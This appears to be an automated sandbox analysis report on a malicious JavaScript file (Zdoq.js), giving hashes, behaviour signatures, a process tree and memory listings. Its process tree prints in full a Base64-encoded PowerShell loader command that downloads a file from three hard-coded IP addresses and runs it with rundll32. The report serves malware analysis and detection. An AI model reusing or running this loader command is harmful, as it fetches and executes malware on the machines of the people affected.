Analysis

  • max time kernel
    81s
  • max time network
    33s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    05/05/2023, 13:38

General

  • Target

    Zdoq.js

  • Size

    61KB

  • MD5

    a1acd1842f3c348d4daf80f8e21a40b7

  • SHA1

    9e29898f393017358dd34c1566212a7dcfeda609

  • SHA256

    ad1d5c2a005030cdb028c5f87cb2280fa43c5310a8f3b316cdb88c33a3d38ee9

  • SHA512

    4a5fceb2e23e953d7a5677f580d57eb5526b047a2c4d6246341e3742b158fe68be695a273ea2098c4986897756d1802b391d9de5abfc5b7cf9eddf58c5b0c6d5

  • SSDEEP

    1536:QzHGd0Nz5gS0W9OG8xTzbGri22QoI7r+7n1PD6ebT9n5Saz:2HGuN2S0WoGYTzb+i22QoI7r+7n1+eZX

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Zdoq.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1724
    • C:\Windows\System32\wscript.exe
      "C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\Zdoq.js" pantamorphiaAscupart Augmentedly
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:804
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANgA1ADsAJABiAHIAYQBzAGUAcgBvACAAPQAgACgAIgBoAHQAdABwADoALwAvADEAOQAyAC4AMQAyADEALgAxADYALgAyADMAMgAvAHcAMABHAC8AYwA5ADcAdwBXAGgAQQAsAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADIAMQAuADEANgAuADIAMwAzAC8AWABUAEwAWQAxAFgAUQAvADMASgBVAEgANQBlADYAYgBIAG4AbABMACwAaAB0AHQAcAA6AC8ALwAxADUAMQAuADIAMwA2AC4AMQA0AC4AMQAyADcALwBGAFEAbwBCAEIAUQAvAHAAVQB4AEcAbgAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJABNAGEAbgB5AHMAaQBkAGUAZABuAGUAcwBzAFcAZQBzAHQAZQByAG4AaQBzAGUAIABpAG4AIAAkAGIAcgBhAHMAZQByAG8AKQAgAHsAdAByAHkAIAB7AHcAZwBlAHQAIAAkAE0AYQBuAHkAcwBpAGQAZQBkAG4AZQBzAHMAVwBlAHMAdABlAHIAbgBpAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwAgADEANwAgAC0ATwAgACQAZQBuAHYAOgBUAEUATQBQAFwAUwBoAGUAcABwAGkAYwBrAE4AbwBuAHAAcgBvAGwAaQBmAGkAYwBuAGUAcwBzAC4AbgBvAG4AaQBuAGMAbABpAG4AYQB0AG8AcgB5AFAAcgBlAHAAcgBpAG4AdABzADsAIABpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQARQBNAFAAXABTAGgAZQBwAHAAaQBjAGsATgBvAG4AcAByAG8AbABpAGYAaQBjAG4AZQBzAHMALgBuAG8AbgBpAG4AYwBsAGkAbgBhAHQAbwByAHkAUAByAGUAcAByAGkAbgB0AHMAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADAAOQAwADAAMAApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBRAEEAUgBRAEIATgBBAEYAQQBBAFgAQQBCAFQAQQBHAGcAQQBaAFEAQgB3AEEASABBAEEAYQBRAEIAagBBAEcAcwBBAFQAZwBCAHYAQQBHADQAQQBjAEEAQgB5AEEARwA4AEEAYgBBAEIAcABBAEcAWQBBAGEAUQBCAGoAQQBHADQAQQBaAFEAQgB6AEEASABNAEEATABnAEIAdQBBAEcAOABBAGIAZwBCAHAAQQBHADQAQQBZAHcAQgBzAEEARwBrAEEAYgBnAEIAaABBAEgAUQBBAGIAdwBCAHkAQQBIAGsAQQBVAEEAQgB5AEEARwBVAEEAYwBBAEIAeQBBAEcAawBBAGIAZwBCADAAQQBIAE0AQQBMAEEAQgBVAEEARwBrAEEAYgBRAEIAbABBAEQAcwBBACIAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADsAfQB9AA=="
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1108

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/1108-58-0x000000001B1A0000-0x000000001B482000-memory.dmp

          Filesize

          2.9MB

        • memory/1108-59-0x0000000002410000-0x0000000002418000-memory.dmp

          Filesize

          32KB

        • memory/1108-60-0x0000000002390000-0x0000000002410000-memory.dmp

          Filesize

          512KB

        • memory/1108-61-0x0000000002390000-0x0000000002410000-memory.dmp

          Filesize

          512KB

        • memory/1108-62-0x0000000002390000-0x0000000002410000-memory.dmp

          Filesize

          512KB

        • memory/1108-63-0x0000000002390000-0x0000000002410000-memory.dmp

          Filesize

          512KB